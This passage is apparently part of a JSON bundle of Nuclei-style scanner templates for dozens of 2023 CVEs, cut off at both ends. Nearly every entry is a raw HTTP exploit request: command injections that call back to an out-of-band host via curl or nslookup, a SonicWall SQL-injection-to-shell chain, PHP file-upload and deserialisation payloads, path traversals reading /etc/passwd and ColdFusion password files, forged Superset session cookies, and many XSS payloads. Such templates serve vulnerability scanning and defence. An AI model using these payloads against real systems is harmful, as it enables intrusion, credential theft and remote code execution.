name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n","GET /modules/jmsblog/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(body_2, \"Jms Blog\")"],"condition":"and"}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-22897","info":{"name":"Securepoint UTM - Leaking Remote Memory Contents","severity":"medium"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"sessionid\":","\"mode\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2023-33440'); ?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-33568","info":{"name":"Dolibarr Unauthenticated Contacts Database Theft","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"database_user\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress-username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress-username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress-username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(value)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"evil.com"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://evil.com/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 